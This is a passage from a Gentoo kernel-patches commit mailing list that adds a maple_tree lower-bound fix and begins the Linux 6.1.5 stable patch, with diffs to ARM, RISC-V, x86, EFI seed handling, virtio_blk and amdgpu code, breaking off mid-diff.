+From:		https://git.kernel.org/pub/scm/linux/kernel/git/next/linux-next.git
+Desc:		maple_tree: fix mas_empty_area_rev() lower bound validation
+
 Patch:  2000_BT-Check-key-sizes-only-if-Secure-Simple-Pairing-enabled.patch
 From:   https://lore.kernel.org/linux-bluetooth/20190522070540.48895-1-marcel@holtmann.org/raw
 Desc:   Bluetooth: Check key sizes only when Secure Simple Pairing is enabled. See bug #686758

diff --git a/1800_maple-tree-fix-mas-empty-area-rev-lower-bound-val.patch b/1800_maple-tree-fix-mas-empty-area-rev-lower-bound-val.patch
new file mode 100644
index 00000000..53075739
--- /dev/null
+++ b/1800_maple-tree-fix-mas-empty-area-rev-lower-bound-val.patch
@@ -0,0 +1,82 @@
+From ebc4c1bcc2a513bb2292dc73aa247b046bc846ce Mon Sep 17 00:00:00 2001
+From: Liam Howlett <liam.howlett@oracle.com>
+Date: Wed, 11 Jan 2023 20:02:07 +0000
+Subject: maple_tree: fix mas_empty_area_rev() lower bound validation
+
+mas_empty_area_rev() was not correctly validating the start of a gap
+against the lower limit.  This could lead to the range starting lower than
+the requested minimum.
+
+Fix the issue by better validating a gap once one is found.
+
+This commit also adds tests to the maple tree test suite for this issue
+and tests the mas_empty_area() function for similar bound checking.
+
+Link: https://lkml.kernel.org/r/20230111200136.1851322-1-Liam.Howlett@oracle.com
+Link: https://bugzilla.kernel.org/show_bug.cgi?id=216911
+Fixes: 54a611b60590 ("Maple Tree: add new data structure")
+Signed-off-by: Liam R. Howlett <Liam.Howlett@oracle.com>
+Reported-by: <amanieu@gmail.com>
+  Link: https://lore.kernel.org/linux-mm/0b9f5425-08d4-8013-aa4c-e620c3b10bb2@leemhuis.info/
+Tested-by: Holger Hoffsttte <holger@applied-asynchrony.com>
+Cc: <stable@vger.kernel.org>
+Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
+---
+ lib/maple_tree.c | 17 ++++++++---------
+ 1 file changed, 8 insertions(+), 9 deletions(-)
+
+(limited to 'lib/maple_tree.c')
+
+diff --git a/lib/maple_tree.c b/lib/maple_tree.c
+index 26e2045d3cda9..b990ccea454ec 100644
+--- a/lib/maple_tree.c
++++ b/lib/maple_tree.c
+@@ -4887,7 +4887,7 @@ static bool mas_rev_awalk(struct ma_state *mas, unsigned long size)
+ 	unsigned long *pivots, *gaps;
+ 	void __rcu **slots;
+ 	unsigned long gap = 0;
+-	unsigned long max, min, index;
++	unsigned long max, min;
+ 	unsigned char offset;
+ 
+ 	if (unlikely(mas_is_err(mas)))
+@@ -4909,8 +4909,7 @@ static bool mas_rev_awalk(struct ma_state *mas, unsigned long size)
+ 		min = mas_safe_min(mas, pivots, --offset);
+ 
+ 	max = mas_safe_pivot(mas, pivots, offset, type);
+-	index = mas->index;
+-	while (index <= max) {
++	while (mas->index <= max) {
+ 		gap = 0;
+ 		if (gaps)
+ 			gap = gaps[offset];
+@@ -4941,10 +4940,8 @@ static bool mas_rev_awalk(struct ma_state *mas, unsigned long size)
+ 		min = mas_safe_min(mas, pivots, offset);
+ 	}
+ 
+-	if (unlikely(index > max)) {
+-		mas_set_err(mas, -EBUSY);
+-		return false;
+-	}
++	if (unlikely((mas->index > max) || (size - 1 > max - mas->index)))
++		goto no_space;
+ 
+ 	if (unlikely(ma_is_leaf(type))) {
+ 		mas->offset = offset;
+@@ -4961,9 +4958,11 @@ static bool mas_rev_awalk(struct ma_state *mas, unsigned long size)
+ 	return false;
+ 
+ ascend:
+-	if (mte_is_root(mas->node))
+-		mas_set_err(mas, -EBUSY);
++	if (!mte_is_root(mas->node))
++		return false;
+ 
++no_space:
++	mas_set_err(mas, -EBUSY);
+ 	return false;
+ }
+ 
+-- 
+cgit 
+


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-01-12 12:16 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-01-12 12:16 UTC (permalink / raw
  To: gentoo-commits

commit:     fec0d2b267acd404f0efbd1f358639439a3b24be
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Thu Jan 12 12:16:30 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Thu Jan 12 12:16:30 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=fec0d2b2

Linux patch 6.1.5

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README            |    6 +-
 1004_linux-6.1.5.patch | 7331 ++++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 7336 insertions(+), 1 deletion(-)

diff --git a/0000_README b/0000_README
index 9fb9179d..e8c453f1 100644
--- a/0000_README
+++ b/0000_README
@@ -55,10 +55,14 @@ Patch:  1002_linux-6.1.3.patch
 From:   http://www.kernel.org
 Desc:   Linux 6.1.3
 
-Patch:  1003_linux-6.1.3.patch
+Patch:  1003_linux-6.1.4.patch
 From:   http://www.kernel.org
 Desc:   Linux 6.1.4
 
+Patch:  1004_linux-6.1.5.patch
+From:   http://www.kernel.org
+Desc:   Linux 6.1.5
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1004_linux-6.1.5.patch b/1004_linux-6.1.5.patch
new file mode 100644
index 00000000..abe4ccbc
--- /dev/null
+++ b/1004_linux-6.1.5.patch
@@ -0,0 +1,7331 @@
+diff --git a/Makefile b/Makefile
+index 56afd1509c74f..ddbd2fc917c59 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 4
++SUBLEVEL = 5
+ EXTRAVERSION =
+ NAME = Hurr durr I'ma ninja sloth
+ 
+diff --git a/arch/arm/include/asm/thread_info.h b/arch/arm/include/asm/thread_info.h
+index aecc403b28804..7f092cb55a417 100644
+--- a/arch/arm/include/asm/thread_info.h
++++ b/arch/arm/include/asm/thread_info.h
+@@ -128,15 +128,16 @@ extern int vfp_restore_user_hwstate(struct user_vfp *,
+ #define TIF_NEED_RESCHED	1	/* rescheduling necessary */
+ #define TIF_NOTIFY_RESUME	2	/* callback before returning to user */
+ #define TIF_UPROBE		3	/* breakpointed or singlestepping */
+-#define TIF_SYSCALL_TRACE	4	/* syscall trace active */
+-#define TIF_SYSCALL_AUDIT	5	/* syscall auditing active */
+-#define TIF_SYSCALL_TRACEPOINT	6	/* syscall tracepoint instrumentation */
+-#define TIF_SECCOMP		7	/* seccomp syscall filtering active */
+-#define TIF_NOTIFY_SIGNAL	8	/* signal notifications exist */
++#define TIF_NOTIFY_SIGNAL	4	/* signal notifications exist */
+ 
+ #define TIF_USING_IWMMXT	17
+ #define TIF_MEMDIE		18	/* is terminating due to OOM killer */
+-#define TIF_RESTORE_SIGMASK	20
++#define TIF_RESTORE_SIGMASK	19
++#define TIF_SYSCALL_TRACE	20	/* syscall trace active */
++#define TIF_SYSCALL_AUDIT	21	/* syscall auditing active */
++#define TIF_SYSCALL_TRACEPOINT	22	/* syscall tracepoint instrumentation */
++#define TIF_SECCOMP		23	/* seccomp syscall filtering active */
++
+ 
+ #define _TIF_SIGPENDING		(1 << TIF_SIGPENDING)
+ #define _TIF_NEED_RESCHED	(1 << TIF_NEED_RESCHED)
+diff --git a/arch/mips/ralink/of.c b/arch/mips/ralink/of.c
+index 01c132bc33d54..4d06de77d92a6 100644
+--- a/arch/mips/ralink/of.c
++++ b/arch/mips/ralink/of.c
+@@ -64,7 +64,7 @@ void __init plat_mem_setup(void)
+ 	dtb = get_fdt();
+ 	__dt_setup_arch(dtb);
+ 
+-	if (!early_init_dt_scan_memory())
++	if (early_init_dt_scan_memory())
+ 		return;
+ 
+ 	if (soc_info.mem_detect)
+diff --git a/arch/riscv/include/asm/uaccess.h b/arch/riscv/include/asm/uaccess.h
+index 855450bed9f52..ec0cab9fbddd0 100644
+--- a/arch/riscv/include/asm/uaccess.h
++++ b/arch/riscv/include/asm/uaccess.h
+@@ -165,7 +165,7 @@ do {								\
+ 	might_fault();						\
+ 	access_ok(__p, sizeof(*__p)) ?		\
+ 		__get_user((x), __p) :				\
+-		((x) = 0, -EFAULT);				\
++		((x) = (__force __typeof__(x))0, -EFAULT);	\
+ })
+ 
+ #define __put_user_asm(insn, x, ptr, err)			\
+diff --git a/arch/riscv/kernel/probes/simulate-insn.h b/arch/riscv/kernel/probes/simulate-insn.h
+index cb6ff7dccb92e..de8474146a9b6 100644
+--- a/arch/riscv/kernel/probes/simulate-insn.h
++++ b/arch/riscv/kernel/probes/simulate-insn.h
+@@ -31,9 +31,9 @@ __RISCV_INSN_FUNCS(fence,	0x7f, 0x0f);
+ 	} while (0)
+ 
+ __RISCV_INSN_FUNCS(c_j,		0xe003, 0xa001);
+-__RISCV_INSN_FUNCS(c_jr,	0xf007, 0x8002);
++__RISCV_INSN_FUNCS(c_jr,	0xf07f, 0x8002);
+ __RISCV_INSN_FUNCS(c_jal,	0xe003, 0x2001);
+-__RISCV_INSN_FUNCS(c_jalr,	0xf007, 0x9002);
++__RISCV_INSN_FUNCS(c_jalr,	0xf07f, 0x9002);
+ __RISCV_INSN_FUNCS(c_beqz,	0xe003, 0xc001);
+ __RISCV_INSN_FUNCS(c_bnez,	0xe003, 0xe001);
+ __RISCV_INSN_FUNCS(c_ebreak,	0xffff, 0x9002);
+diff --git a/arch/x86/kernel/cpu/bugs.c b/arch/x86/kernel/cpu/bugs.c
+index 6daf842295489..16d8e43be7758 100644
+--- a/arch/x86/kernel/cpu/bugs.c
++++ b/arch/x86/kernel/cpu/bugs.c
+@@ -1951,6 +1951,8 @@ static int ib_prctl_set(struct task_struct *task, unsigned long ctrl)
+ 		if (ctrl == PR_SPEC_FORCE_DISABLE)
+ 			task_set_spec_ib_force_disable(task);
+ 		task_update_spec_tif(task);
++		if (task == current)
++			indirect_branch_prediction_barrier();
+ 		break;
+ 	default:
+ 		return -ERANGE;
+diff --git a/arch/x86/kernel/crash.c b/arch/x86/kernel/crash.c
+index 9730c88530fc8..305514431f26e 100644
+--- a/arch/x86/kernel/crash.c
++++ b/arch/x86/kernel/crash.c
+@@ -401,10 +401,8 @@ int crash_load_segments(struct kimage *image)
+ 	kbuf.buf_align = ELF_CORE_HEADER_ALIGN;
+ 	kbuf.mem = KEXEC_BUF_MEM_UNKNOWN;
+ 	ret = kexec_add_buffer(&kbuf);
+-	if (ret) {
+-		vfree((void *)image->elf_headers);
++	if (ret)
+ 		return ret;
+-	}
+ 	image->elf_load_addr = kbuf.mem;
+ 	pr_debug("Loaded ELF headers at 0x%lx bufsz=0x%lx memsz=0x%lx\n",
+ 		 image->elf_load_addr, kbuf.bufsz, kbuf.memsz);
+diff --git a/block/blk-merge.c b/block/blk-merge.c
+index ff04e9290715a..f46c87ef951df 100644
+--- a/block/blk-merge.c
++++ b/block/blk-merge.c
+@@ -300,6 +300,16 @@ static struct bio *bio_split_rw(struct bio *bio, struct queue_limits *lim,
+ 	*segs = nsegs;
+ 	return NULL;
+ split:
++	/*
++	 * We can't sanely support splitting for a REQ_NOWAIT bio. End it
++	 * with EAGAIN if splitting is required and return an error pointer.
++	 */
++	if (bio->bi_opf & REQ_NOWAIT) {
++		bio->bi_status = BLK_STS_AGAIN;
++		bio_endio(bio);
++		return ERR_PTR(-EAGAIN);
++	}
++
+ 	*segs = nsegs;
+ 
+ 	/*
+diff --git a/drivers/acpi/acpi_video.c b/drivers/acpi/acpi_video.c
+index 32953646caebf..0c79f463fbfd4 100644
+--- a/drivers/acpi/acpi_video.c
++++ b/drivers/acpi/acpi_video.c
+@@ -70,11 +70,7 @@ module_param(device_id_scheme, bool, 0444);
+ static int only_lcd = -1;
+ module_param(only_lcd, int, 0444);
+ 
+-/*
+- * Display probing is known to take up to 5 seconds, so delay the fallback
+- * backlight registration by 5 seconds + 3 seconds for some extra margin.
+- */
+-static int register_backlight_delay = 8;
++static int register_backlight_delay;
+ module_param(register_backlight_delay, int, 0444);
+ MODULE_PARM_DESC(register_backlight_delay,
+ 	"Delay in seconds before doing fallback (non GPU driver triggered) "
+@@ -2178,6 +2174,17 @@ static bool should_check_lcd_flag(void)
+ 	return false;
+ }
+ 
++/*
++ * At least one graphics driver has reported that no LCD is connected
++ * via the native interface. cancel the registration for fallback acpi_video0.
++ * If another driver still deems this necessary, it can explicitly register it.
++ */
++void acpi_video_report_nolcd(void)
++{
++	cancel_delayed_work(&video_bus_register_backlight_work);
++}
++EXPORT_SYMBOL(acpi_video_report_nolcd);
++
+ int acpi_video_register(void)
+ {
+ 	int ret = 0;
+diff --git a/drivers/block/ublk_drv.c b/drivers/block/ublk_drv.c
+index e9de9d846b730..17b677b5d3b22 100644
+--- a/drivers/block/ublk_drv.c
++++ b/drivers/block/ublk_drv.c
+@@ -1992,6 +1992,9 @@ static int ublk_ctrl_uring_cmd(struct io_uring_cmd *cmd,
+ 	struct ublksrv_ctrl_cmd *header = (struct ublksrv_ctrl_cmd *)cmd->cmd;
+ 	int ret = -EINVAL;
+ 
++	if (issue_flags & IO_URING_F_NONBLOCK)
++		return -EAGAIN;
++
+ 	ublk_ctrl_cmd_dump(cmd);
+ 
+ 	if (!(issue_flags & IO_URING_F_SQE128))
+diff --git a/drivers/block/virtio_blk.c b/drivers/block/virtio_blk.c
+index 19da5defd7348..a7697027ce43b 100644
+--- a/drivers/block/virtio_blk.c
++++ b/drivers/block/virtio_blk.c
+@@ -315,22 +315,35 @@ static void virtio_commit_rqs(struct blk_mq_hw_ctx *hctx)
+ 		virtqueue_notify(vq->vq);
+ }
+ 
++static blk_status_t virtblk_fail_to_queue(struct request *req, int rc)
++{
++	virtblk_cleanup_cmd(req);
++	switch (rc) {
++	case -ENOSPC:
++		return BLK_STS_DEV_RESOURCE;
++	case -ENOMEM:
++		return BLK_STS_RESOURCE;
++	default:
++		return BLK_STS_IOERR;
++	}
++}
++
+ static blk_status_t virtblk_prep_rq(struct blk_mq_hw_ctx *hctx,
+ 					struct virtio_blk *vblk,
+ 					struct request *req,
+ 					struct virtblk_req *vbr)
+ {
+ 	blk_status_t status;
++	int num;
+ 
+ 	status = virtblk_setup_cmd(vblk->vdev, req, vbr);
+ 	if (unlikely(status))
+ 		return status;
+ 
+-	vbr->sg_table.nents = virtblk_map_data(hctx, req, vbr);
+-	if (unlikely(vbr->sg_table.nents < 0)) {
+-		virtblk_cleanup_cmd(req);
+-		return BLK_STS_RESOURCE;
+-	}
++	num = virtblk_map_data(hctx, req, vbr);
++	if (unlikely(num < 0))
++		return virtblk_fail_to_queue(req, -ENOMEM);
++	vbr->sg_table.nents = num;
+ 
+ 	blk_mq_start_request(req);
+ 
+@@ -364,15 +377,7 @@ static blk_status_t virtio_queue_rq(struct blk_mq_hw_ctx *hctx,
+ 			blk_mq_stop_hw_queue(hctx);
+ 		spin_unlock_irqrestore(&vblk->vqs[qid].lock, flags);
+ 		virtblk_unmap_data(req, vbr);
+-		virtblk_cleanup_cmd(req);
+-		switch (err) {
+-		case -ENOSPC:
+-			return BLK_STS_DEV_RESOURCE;
+-		case -ENOMEM:
+-			return BLK_STS_RESOURCE;
+-		default:
+-			return BLK_STS_IOERR;
+-		}
++		return virtblk_fail_to_queue(req, err);
+ 	}
+ 
+ 	if (bd->last && virtqueue_kick_prepare(vblk->vqs[qid].vq))
+diff --git a/drivers/char/tpm/tpm-interface.c b/drivers/char/tpm/tpm-interface.c
+index d69905233aff2..7e513b7718320 100644
+--- a/drivers/char/tpm/tpm-interface.c
++++ b/drivers/char/tpm/tpm-interface.c
+@@ -412,7 +412,9 @@ int tpm_pm_suspend(struct device *dev)
+ 	}
+ 
+ suspended:
+-	return rc;
++	if (rc)
++		dev_err(dev, "Ignoring error %d while suspending\n", rc);
++	return 0;
+ }
+ EXPORT_SYMBOL_GPL(tpm_pm_suspend);
+ 
+diff --git a/drivers/crypto/virtio/virtio_crypto_skcipher_algs.c b/drivers/crypto/virtio/virtio_crypto_skcipher_algs.c
+index e553ccadbcbc8..e5876286828b8 100644
+--- a/drivers/crypto/virtio/virtio_crypto_skcipher_algs.c
++++ b/drivers/crypto/virtio/virtio_crypto_skcipher_algs.c
+@@ -239,7 +239,8 @@ static int virtio_crypto_alg_skcipher_close_session(
+ 		pr_err("virtio_crypto: Close session failed status: %u, session_id: 0x%llx\n",
+ 			ctrl_status->status, destroy_session->session_id);
+ 
+-		return -EINVAL;
++		err = -EINVAL;
++		goto out;
+ 	}
+ 
+ 	err = 0;
+diff --git a/drivers/firmware/efi/efi.c b/drivers/firmware/efi/efi.c
+index a46df5d1d0942..f12cc29bd4b84 100644
+--- a/drivers/firmware/efi/efi.c
++++ b/drivers/firmware/efi/efi.c
+@@ -611,7 +611,7 @@ int __init efi_config_parse_tables(const efi_config_table_t *config_tables,
+ 
+ 		seed = early_memremap(efi_rng_seed, sizeof(*seed));
+ 		if (seed != NULL) {
+-			size = min(seed->size, EFI_RANDOM_SEED_SIZE);
++			size = min_t(u32, seed->size, SZ_1K); // sanity check
+ 			early_memunmap(seed, sizeof(*seed));
+ 		} else {
+ 			pr_err("Could not map UEFI random seed!\n");
+@@ -620,8 +620,8 @@ int __init efi_config_parse_tables(const efi_config_table_t *config_tables,
+ 			seed = early_memremap(efi_rng_seed,
+ 					      sizeof(*seed) + size);
+ 			if (seed != NULL) {
+-				pr_notice("seeding entropy pool\n");
+ 				add_bootloader_randomness(seed->bits, size);
++				memzero_explicit(seed->bits, size);
+ 				early_memunmap(seed, sizeof(*seed) + size);
+ 			} else {
+ 				pr_err("Could not map UEFI random seed!\n");
+diff --git a/drivers/firmware/efi/libstub/efistub.h b/drivers/firmware/efi/libstub/efistub.h
+index eb03d5a9aac88..900df67a20785 100644
+--- a/drivers/firmware/efi/libstub/efistub.h
++++ b/drivers/firmware/efi/libstub/efistub.h
+@@ -882,6 +882,8 @@ efi_status_t efi_get_random_bytes(unsigned long size, u8 *out);
+ efi_status_t efi_random_alloc(unsigned long size, unsigned long align,
+ 			      unsigned long *addr, unsigned long random_seed);
+ 
++efi_status_t efi_random_get_seed(void);
++
+ efi_status_t check_platform_features(void);
+ 
+ void *get_efi_config_table(efi_guid_t guid);
+diff --git a/drivers/firmware/efi/libstub/random.c b/drivers/firmware/efi/libstub/random.c
+index 33ab567695951..f85d2c0668777 100644
+--- a/drivers/firmware/efi/libstub/random.c
++++ b/drivers/firmware/efi/libstub/random.c
+@@ -67,27 +67,43 @@ efi_status_t efi_random_get_seed(void)
+ 	efi_guid_t rng_proto = EFI_RNG_PROTOCOL_GUID;
+ 	efi_guid_t rng_algo_raw = EFI_RNG_ALGORITHM_RAW;
+ 	efi_guid_t rng_table_guid = LINUX_EFI_RANDOM_SEED_TABLE_GUID;
++	struct linux_efi_random_seed *prev_seed, *seed = NULL;
++	int prev_seed_size = 0, seed_size = EFI_RANDOM_SEED_SIZE;
+ 	efi_rng_protocol_t *rng = NULL;
+-	struct linux_efi_random_seed *seed = NULL;
+ 	efi_status_t status;
+ 
+ 	status = efi_bs_call(locate_protocol, &rng_proto, NULL, (void **)&rng);
+ 	if (status != EFI_SUCCESS)
+ 		return status;
+ 
++	/*
++	 * Check whether a seed was provided by a prior boot stage. In that
++	 * case, instead of overwriting it, let's create a new buffer that can
++	 * hold both, and concatenate the existing and the new seeds.
++	 * Note that we should read the seed size with caution, in case the
++	 * table got corrupted in memory somehow.
++	 */
++	prev_seed = get_efi_config_table(LINUX_EFI_RANDOM_SEED_TABLE_GUID);
++	if (prev_seed && prev_seed->size <= 512U) {
++		prev_seed_size = prev_seed->size;
++		seed_size += prev_seed_size;
++	}
++
+ 	/*
+ 	 * Use EFI_ACPI_RECLAIM_MEMORY here so that it is guaranteed that the
+ 	 * allocation will survive a kexec reboot (although we refresh the seed
+ 	 * beforehand)
+ 	 */
+ 	status = efi_bs_call(allocate_pool, EFI_ACPI_RECLAIM_MEMORY,
+-			     sizeof(*seed) + EFI_RANDOM_SEED_SIZE,
++			     struct_size(seed, bits, seed_size),
+ 			     (void **)&seed);
+-	if (status != EFI_SUCCESS)
+-		return status;
++	if (status != EFI_SUCCESS) {
++		efi_warn("Failed to allocate memory for RNG seed.\n");
++		goto err_warn;
++	}
+ 
+ 	status = efi_call_proto(rng, get_rng, &rng_algo_raw,
+-				 EFI_RANDOM_SEED_SIZE, seed->bits);
++				EFI_RANDOM_SEED_SIZE, seed->bits);
+ 
+ 	if (status == EFI_UNSUPPORTED)
+ 		/*
+@@ -100,14 +116,28 @@ efi_status_t efi_random_get_seed(void)
+ 	if (status != EFI_SUCCESS)
+ 		goto err_freepool;
+ 
+-	seed->size = EFI_RANDOM_SEED_SIZE;
++	seed->size = seed_size;
++	if (prev_seed_size)
++		memcpy(seed->bits + EFI_RANDOM_SEED_SIZE, prev_seed->bits,
++		       prev_seed_size);
++
+ 	status = efi_bs_call(install_configuration_table, &rng_table_guid, seed);
+ 	if (status != EFI_SUCCESS)
+ 		goto err_freepool;
+ 
++	if (prev_seed_size) {
++		/* wipe and free the old seed if we managed to install the new one */
++		memzero_explicit(prev_seed->bits, prev_seed_size);
++		efi_bs_call(free_pool, prev_seed);
++	}
+ 	return EFI_SUCCESS;
+ 
+ err_freepool:
++	memzero_explicit(seed, struct_size(seed, bits, seed_size));
+ 	efi_bs_call(free_pool, seed);
++	efi_warn("Failed to obtain seed from EFI_RNG_PROTOCOL\n");
++err_warn:
++	if (prev_seed)
++		efi_warn("Retaining bootloader-supplied seed only");
+ 	return status;
+ }
+diff --git a/drivers/gpio/gpio-pca953x.c b/drivers/gpio/gpio-pca953x.c
+index ebe1943b85dd9..bf21803a00363 100644
+--- a/drivers/gpio/gpio-pca953x.c
++++ b/drivers/gpio/gpio-pca953x.c
+@@ -473,6 +473,9 @@ static u8 pcal6534_recalc_addr(struct pca953x_chip *chip, int reg, int off)
+ 	case PCAL6524_DEBOUNCE:
+ 		pinctrl = ((reg & PCAL_PINCTRL_MASK) >> 1) + 0x1c;
+ 		break;
++	default:
++		pinctrl = 0;
++		break;
+ 	}
+ 
+ 	return pinctrl + addr + (off / BANK_SZ);
+diff --git a/drivers/gpio/gpio-sifive.c b/drivers/gpio/gpio-sifive.c
+index 238f3210970cf..bc5660f61c570 100644
+--- a/drivers/gpio/gpio-sifive.c
++++ b/drivers/gpio/gpio-sifive.c
+@@ -215,6 +215,7 @@ static int sifive_gpio_probe(struct platform_device *pdev)
+ 		return -ENODEV;
+ 	}
+ 	parent = irq_find_host(irq_parent);
++	of_node_put(irq_parent);
+ 	if (!parent) {
+ 		dev_err(dev, "no IRQ parent domain\n");
+ 		return -ENODEV;
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu.h b/drivers/gpu/drm/amd/amdgpu/amdgpu.h
+index 2eca58220550e..5f1d0990c6f34 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu.h
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu.h
+@@ -196,6 +196,7 @@ extern int amdgpu_emu_mode;
+ extern uint amdgpu_smu_memory_pool_size;
+ extern int amdgpu_smu_pptable_id;
+ extern uint amdgpu_dc_feature_mask;
++extern uint amdgpu_freesync_vid_mode;
+ extern uint amdgpu_dc_debug_mask;
+ extern uint amdgpu_dc_visual_confirm;
+ extern uint amdgpu_dm_abm_level;
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_amdkfd.h b/drivers/gpu/drm/amd/amdgpu/amdgpu_amdkfd.h
+index 647220a8762dc..30f145dc8724e 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_amdkfd.h
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_amdkfd.h
+@@ -265,8 +265,10 @@ int amdgpu_amdkfd_get_pcie_bandwidth_mbytes(struct amdgpu_device *adev, bool is_
+ 	(&((struct amdgpu_fpriv *)					\
+ 		((struct drm_file *)(drm_priv))->driver_priv)->vm)
+ 
++int amdgpu_amdkfd_gpuvm_set_vm_pasid(struct amdgpu_device *adev,
++				     struct file *filp, u32 pasid);
+ int amdgpu_amdkfd_gpuvm_acquire_process_vm(struct amdgpu_device *adev,
+-					struct file *filp, u32 pasid,
++					struct file *filp,
+ 					void **process_info,
+ 					struct dma_fence **ef);
+ void amdgpu_amdkfd_gpuvm_release_process_vm(struct amdgpu_device *adev,
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_amdkfd_gpuvm.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_amdkfd_gpuvm.c
+index fe87b3402f06a..29f045079a3e1 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_amdkfd_gpuvm.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_amdkfd_gpuvm.c
+@@ -1473,10 +1473,9 @@ static void amdgpu_amdkfd_gpuvm_unpin_bo(struct amdgpu_bo *bo)
+ 	amdgpu_bo_unreserve(bo);
+ }
+ 
+-int amdgpu_amdkfd_gpuvm_acquire_process_vm(struct amdgpu_device *adev,
+-					   struct file *filp, u32 pasid,
+-					   void **process_info,
+-					   struct dma_fence **ef)
++int amdgpu_amdkfd_gpuvm_set_vm_pasid(struct amdgpu_device *adev,
++				     struct file *filp, u32 pasid)
++
+ {
+ 	struct amdgpu_fpriv *drv_priv;
+ 	struct amdgpu_vm *avm;
+@@ -1487,10 +1486,6 @@ int amdgpu_amdkfd_gpuvm_acquire_process_vm(struct amdgpu_device *adev,
+ 		return ret;
+ 	avm = &drv_priv->vm;
+ 
+-	/* Already a compute VM? */
+-	if (avm->process_info)
+-		return -EINVAL;
+-
+ 	/* Free the original amdgpu allocated pasid,
+ 	 * will be replaced with kfd allocated pasid.
+ 	 */
+@@ -1499,14 +1494,36 @@ int amdgpu_amdkfd_gpuvm_acquire_process_vm(struct amdgpu_device *adev,
+ 		amdgpu_vm_set_pasid(adev, avm, 0);
+ 	}
+ 
+-	/* Convert VM into a compute VM */
+-	ret = amdgpu_vm_make_compute(adev, avm);
++	ret = amdgpu_vm_set_pasid(adev, avm, pasid);
+ 	if (ret)
+ 		return ret;
+ 
+-	ret = amdgpu_vm_set_pasid(adev, avm, pasid);
++	return 0;
++}
++
++int amdgpu_amdkfd_gpuvm_acquire_process_vm(struct amdgpu_device *adev,
++					   struct file *filp,
++					   void **process_info,
++					   struct dma_fence **ef)
++{
++	struct amdgpu_fpriv *drv_priv;
++	struct amdgpu_vm *avm;
++	int ret;
++
++	ret = amdgpu_file_to_fpriv(filp, &drv_priv);
+ 	if (ret)
+ 		return ret;
++	avm = &drv_priv->vm;
++
++	/* Already a compute VM? */
++	if (avm->process_info)
++		return -EINVAL;
++
++	/* Convert VM into a compute VM */
++	ret = amdgpu_vm_make_compute(adev, avm);
++	if (ret)
++		return ret;
++
+ 	/* Initialize KFD part of the VM and process info */
+ 	ret = init_kfd_vm(avm, process_info, ef);
+ 	if (ret)
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_drv.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_drv.c
+index d8dfbb9b735dc..b59466972ed7a 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_drv.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_drv.c
+@@ -180,6 +180,7 @@ int amdgpu_mes_kiq;
+ int amdgpu_noretry = -1;
+ int amdgpu_force_asic_type = -1;
+ int amdgpu_tmz = -1; /* auto */
++uint amdgpu_freesync_vid_mode;
+ int amdgpu_reset_method = -1; /* auto */
+ int amdgpu_num_kcq = -1;
+ int amdgpu_smartshift_bias;
+@@ -877,6 +878,32 @@ module_param_named(backlight, amdgpu_backlight, bint, 0444);
+ MODULE_PARM_DESC(tmz, "Enable TMZ feature (-1 = auto (default), 0 = off, 1 = on)");
+ module_param_named(tmz, amdgpu_tmz, int, 0444);
+ 
++/**
++ * DOC: freesync_video (uint)
++ * Enable the optimization to adjust front porch timing to achieve seamless
++ * mode change experience when setting a freesync supported mode for which full
++ * modeset is not needed.
++ *
++ * The Display Core will add a set of modes derived from the base FreeSync
++ * video mode into the corresponding connector's mode list based on commonly
++ * used refresh rates and VRR range of the connected display, when users enable
++ * this feature. From the userspace perspective, they can see a seamless mode
++ * change experience when the change between different refresh rates under the
++ * same resolution. Additionally, userspace applications such as Video playback
++ * can read this modeset list and change the refresh rate based on the video
++ * frame rate. Finally, the userspace can also derive an appropriate mode for a
++ * particular refresh rate based on the FreeSync Mode and add it to the
++ * connector's mode list.
++ *
++ * Note: This is an experimental feature.
++ *
++ * The default value: 0 (off).
++ */
++MODULE_PARM_DESC(
++	freesync_video,
++	"Enable freesync modesetting optimization feature (0 = off (default), 1 = on)");
++module_param_named(freesync_video, amdgpu_freesync_vid_mode, uint, 0444);
++
+ /**
+  * DOC: reset_method (int)
+  * GPU reset method (-1 = auto (default), 0 = legacy, 1 = mode0, 2 = mode1, 3 = mode2, 4 = baco)
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_object.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_object.c
+index 3df13d841e4d5..3be3cba3a16db 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_object.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_object.c
+@@ -446,27 +446,24 @@ static bool amdgpu_bo_validate_size(struct amdgpu_device *adev,
+ 
+ 	/*
+ 	 * If GTT is part of requested domains the check must succeed to
+-	 * allow fall back to GTT
++	 * allow fall back to GTT.
+ 	 */
+ 	if (domain & AMDGPU_GEM_DOMAIN_GTT) {
+ 		man = ttm_manager_type(&adev->mman.bdev, TTM_PL_TT);
+ 
+-		if (size < man->size)
++		if (man && size < man->size)
+ 			return true;
+-		else
